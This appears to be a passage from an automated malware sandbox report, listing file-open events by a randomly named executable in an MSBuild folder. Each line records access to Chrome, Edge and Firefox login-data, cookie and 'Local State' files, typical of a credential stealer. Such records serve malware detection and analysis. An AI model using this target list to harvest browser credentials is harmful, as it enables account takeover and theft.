                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
